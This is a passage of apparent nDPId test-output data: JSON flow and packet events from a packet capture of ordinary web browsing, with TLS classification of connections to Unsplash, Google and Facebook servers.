+00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":693,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1605289714832,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714832,"pkt":"qtsDr8lk5EKm5WPyht1gCp8uACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAAcg3toBu85LuqOssjhbgBAB+6D6AAABAQgKdGBlEMK5JIc="} +00937{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":694,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714782,"flow_last_seen":1605289714833,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714833,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images.unsplash.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":870,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714782,"flow_last_seen":1605289714867,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605289714867,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images.unsplash.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +03219{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":876,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605289714782,"flow_last_seen":1605289714869,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6069,"flow_avg_l4_payload_len":505,"midstream":0,"thread_ts_msec":1605289714869,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"images.unsplash.com","server_names":"imgix2.map.fastly.net,*.camp-fire.jp,*.carwow.co.uk,*.carwow.de,*.carwow.es,*.catchandrelease.com,*.dorothee-schumacher.com,*.footway.com,*.img-ikyu.com,*.imgix.drizly.com,*.instamotor.com,*.microdinc.com,*.msastaging.com,*.peddle.com,*.remax.ca,*.ustudio.com,*.vaping360.com,*.weber.com,article-image-ix.nikkei.com,assets.eberhardt-travel.de,assets.verishop.com,assets.verishop.xyz,cdn.airstream.com,cdn.elementthree.com,cdn.hashnode.com,cdn.naturalhealthyconcepts.com,cdn.parent.eu,cdn.phonehouse.es,cdn.shiplus.co.il,i.drop-cdn.com,i.upworthy.com,image.volunteerworld.com,imageproxy.themaven.net,images-dev.takeshape.io,images.101cookbooks.com,images.beano.com,images.businessoffashion.com,images.congstar.de,images.diesdas.digital,images.fandor.com,images.greetingsisland.com,images.malaecuia.com.br,images.omaze.com,images.roulottesgagnon.com,images.takeshape.io,images.thewanderful.co,images.unsplash.com,images.victoriaplum.com,images.vraiandoro.com,img-1.homely.com.au,img-stack.imagereflow.com,img.badshop.se,img.bernieandphyls.com,img.bioopticsworld.com,img.broadbandtechreport.com,img.broadwaybox.com,img.bygghemma.se,img.bygghjemme.no,img.byggshop.se,img.cablinginstall.com,img.dentaleconomics.com,img.dentistryiq.com,img.evaluationengineering.com,img.golvshop.se,img.grudado.com.br,img.industrial-lasers.com,img.induux.de,img.intelligent-aerospace.com,img.inturn.co,img.laserfocusworld.com,img.ledsmagazine.com,img.lightwaveonline.com,img.militaryaerospace.com,img.mychannels.video,img.officer.com,img.offshore-mag.com,img.ogj.com,img.perioimplantadvisory.com,img.plasticsmachinerymagazine.com,img.prevu.com,img.rdhmag.com,img.speedcurve.com,img.strategies-u.com,img.utilityproducts.com,img.vision-systems.com,img.waterworld.com,img.workbook.com,img.xlhemma.se,img1.nowpurchase.com,iw.induux.de,m.22slides.com,media.sailrace.com,media.useyourlocal.com,pictures.hideaways.dk,raven.contrado.com,reso
urces.intuitive.com,static.doorsuperstore.co.uk","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign CloudSSL CA - SHA256 - G3","subjectDN":"C=US, ST=California, L=San Francisco, O=Fastly, Inc., CN=imgix2.map.fastly.net","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1F:BC:A1:79:48:96:70:32:B8:08:C1:38:D4:20:12:BE:D9:6F:14:B6"}} +00619{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2206,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289715133,"flow_last_seen":1605289715133,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289715133,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2206,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1605289715133,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715133,"pkt":"qtsDr8lk5EKm5WPyht1gAUyOACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACADyX4Bu+HPmfcAAAAAoAL9IJHxAAACBAWgBAIICjiITggAAAAAAQMDBw=="} 
+00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2778,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1605289715210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715210,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgWAAAAAAAAIAMqAcsBIEmLB5kd7IUo3\/YpAbvJfoEpGV7hz5n4oBJXgLSTAAACBAV4AQMDAwQCCArCuSXYOIhOCA=="} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2781,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1605289715210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289715210,"pkt":"qtsDr8lk5EKm5WPyht1gAUyOACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACADyX4Bu+HPmfiBKRlfgBAB+zhYAAABAQgKOIhOVcK5Jdg="} +00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2792,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715133,"flow_last_seen":1605289715212,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289715212,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00619{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2896,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289715221,"flow_last_seen":1605289715221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289715221,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54416,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2896,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1605289715221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715221,"pkt":"qtsDr8lk5EKm5WPyht1gDRmqACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBgAAAAAAACAO1JABu7b0CzwAAAAAoAL9ILgWAAACBAWgBAIICnB0noAAAAAAAQMDBw=="} +00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3385,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1605289715273,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715273,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgGAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvUkNYqBSe29As9oBJXgJmfAAACBAV4AQMDAwQCCArCuSYncHSegA=="} 
+00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3387,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1605289715273,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289715273,"pkt":"qtsDr8lk5EKm5WPyht1gDRmqACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBgAAAAAAACAO1JABu7b0Cz3WKgUogBAB+x19AAABAQgKcHSetMK5Jic="} +00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3394,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715221,"flow_last_seen":1605289715274,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289715274,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54416,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apis.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00625{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3395,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289715274,"flow_last_seen":1605289715274,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289715274,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f030:13:face:b00c::3","src_port":51292,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3395,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1605289715274,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715274,"pkt":"qtsDr8lk5EKm5WPyht1gCiKuACgGQCoBywEgSYsHmR3shSjf9ikqAyiA8DAAE\/rOsAwAAAADyFwBu3K5vIYAAAAAoAL9IIqeAAACBAWgBAIICrhM3AoAAAAAAQMDBw=="} +00995{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3513,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715133,"flow_last_seen":1605289715287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289715287,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"www.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3659,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1605289715301,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715301,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoDKIDwMAAT+s6wDAAAAAMqAcsBIEmLB5kd7IUo3\/YpAbvIXBJtCi5yubyHoBJXgCqsAAACBAV4AQMDAwQCCArCuSZZuEzcCg=="} +00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3662,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1605289715301,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289715301,"pkt":"qtsDr8lk5EKm5WPyht1gCiKuACAGQCoBywEgSYsHmR3shSjf9ikqAyiA8DAAE\/rOsAwAAAADyFwBu3K5vIcSbQovgBAB+66iAAABAQgKuEzcJcK5Jlk="} +00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3667,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715274,"flow_last_seen":1605289715301,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289715301,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f030:13:face:b00c::3","src_port":51292,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connect.facebook.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00995{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3797,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715221,"flow_last_seen":1605289715321,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289715321,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54416,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"apis.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01011{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3820,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715274,"flow_last_seen":1605289715333,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1380,"flow_tot_l4_payload_len":1897,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1605289715333,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f030:13:face:b00c::3","src_port":51292,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"connect.facebook.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00628{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6497,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289715782,"flow_last_seen":1605289715782,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289715782,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f11f:83:face:b00c::25de","src_port":60340,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6497,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1605289715782,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715782,"pkt":"qtsDr8lk5EKm5WPyht1gAWIEACgGQCoBywEgSYsHmR3shSjf9ikqAyiA8R8Ag\/rOsAwAACXe67QBu2RbtWoAAAAAoAL9IBbyAAACBAWgBAIICmcfa8wAAAAAAQMDBw=="} 
+00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6878,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1605289715833,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715833,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoDKIDxHwCD+s6wDAAAJd4qAcsBIEmLB5kd7IUo3\/YpAbvrtAAp+EJkW7VroBJXgNkoAAACBAV4AQMDAwQCCArCuShfZx9rzA=="} +00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6886,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1605289715833,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289715833,"pkt":"qtsDr8lk5EKm5WPyht1gAWIEACAGQCoBywEgSYsHmR3shSjf9ikqAyiA8R8Ag\/rOsAwAACXe67QBu2RbtWsAKfhDgBAB+10HAAABAQgKZx9r\/8K5KF8="} +00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6914,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715782,"flow_last_seen":1605289715834,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289715834,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f11f:83:face:b00c::25de","src_port":60340,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.facebook.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00619{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7909,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289715966,"flow_last_seen":1605289715966,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289715966,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47790,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7909,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1605289715966,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715966,"pkt":"qtsDr8lk5EKm5WPyht1gDvs7ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAKuq4Bu2\/h7B4AAAAAoAL9IFQFAAACBAWgBAIICqkvSd0AAAAAAQMDBw=="} +01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8857,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715782,"flow_last_seen":1605289716018,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1380,"flow_tot_l4_payload_len":1897,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1605289716018,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f11f:83:face:b00c::25de","src_port":60340,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"www.facebook.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8901,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1605289716021,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289716021,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgWAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbu6rg79HT9v4ewfoBJXgOHBAAACBAV4AQMDAwQCCArCuSkJqS9J3Q=="} +00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8902,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1605289716021,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289716021,"pkt":"qtsDr8lk5EKm5WPyht1gDvs7ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAKuq4Bu2\/h7B8O\/R1AgBAB+2WcAAABAQgKqS9KFMK5KQk="} +00978{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8903,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715966,"flow_last_seen":1605289716024,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289716024,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47790,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
